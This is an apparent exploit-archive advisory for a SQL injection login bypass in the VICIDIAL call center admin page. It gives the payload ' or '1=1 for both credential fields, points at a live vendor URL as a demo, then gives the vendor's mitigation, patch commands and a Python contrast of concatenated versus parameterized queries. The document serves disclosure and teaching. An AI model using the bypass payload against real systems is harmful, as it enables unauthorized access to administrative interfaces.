VICIDIAL 2.0.5-173 (Auth Bypass) SQL Injection Vulnerability
2009-05-21 17:01:08
#########################################################################################################
[+] Type Exploit: VICIDIAL call center suite (Admin Bypass) SQL Injection Vulnerability
[+] Script Homepage: http://www.vicidial.org
[+] Discovered By: Striker7
[+] Greets: His0k4, Super Cristal, Yassine_enp, Dreadful, Str0ke, and all Hacker Muslims (Dz)
[+] www.Snakespc.com
[+] Back To Hacker Of Nother Method
#########################################################################################################
[+] Exploit(Ex):
http://[Target].com/[path]/admin.php
then >>
Username: ' or '1=1
Password: ' or '1=1
[+]Live Demo:
http://www.vicidial.org/vicidial/admin.php
#########################################################################################################
Fixes
The vulnerability only allows access to view a list of users and campaigns, but if the exploiter tries to go into any of the detail screens they will be told they do not have permission to view them.
This vulnerability is not present on default installations of the ViciDial Call Center Suite; the system settings must be changed by the end user to allow for non-latin characters in order for this vulnerability to be enabled. The quickest way to deactivate this vulnerability is to disable non-latin characters in ViciDial by changing the "Use Non-Latin" field in the Admin -> System Settings screen to '0'.
The affected versions of ViciDial are the 2.0.5 release and earlier.
If you need to use non-latin characters, the following patch is available for your systems:
http://www.eflo.net/vicidial/security_fix_admin_20090522.patch
On your system, simply run these commands:
$ cd /path/from/root/to/web/vicidial
$ wget http://www.eflo.net/vicidial/security_fix_admin_20090522.patch
$ patch -p1 < ./security_fix_admin_20090522.patch
File to patch: admin.php
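The login input shown above works because the submitted credentials end up spliced into the SQL text of the authentication query. The following is an added illustration (not ViciDial's code; the table, column names and rows are constructed) that shows that exact input against a string-built query and against the same query with bound parameters, which is the class of fix an admin login should rely on:

```python
import sqlite3

# Constructed sample table for illustration only; not the ViciDial schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, user_level INTEGER)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret', 9)")
    conn.execute("INSERT INTO users VALUES ('agent1', 'pw', 1)")
    conn.commit()
    return conn

def build_concat_query(username, password):
    """Vulnerable pattern: credentials are pasted into the SQL string."""
    return ("SELECT count(*) FROM users WHERE username='%s' AND password='%s'"
            % (username, password))

def login_concat(conn, username, password):
    """Returns True if the string-built query matches at least one row.
    With username and password set to ' or '1=1 the WHERE clause becomes
    username='' or '1=1' AND password='' or '1=1', which is true for every row."""
    sql = build_concat_query(username, password)
    return conn.execute(sql).fetchone()[0] > 0

def login_param(conn, username, password):
    """Hardened pattern: the same query with bound parameters. The quote and
    the or-clause are treated as literal characters of the username value."""
    sql = "SELECT count(*) FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0

if __name__ == "__main__":
    db = make_db()
    bypass = "' or '1=1"
    print(build_concat_query(bypass, bypass))
    print("concat login with bypass input:", login_concat(db, bypass, bypass))
    print("param login with bypass input: ", login_param(db, bypass, bypass))
```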
If you have any other questions related to this, please contact the ViciDial
Group: http://www.vicidial.com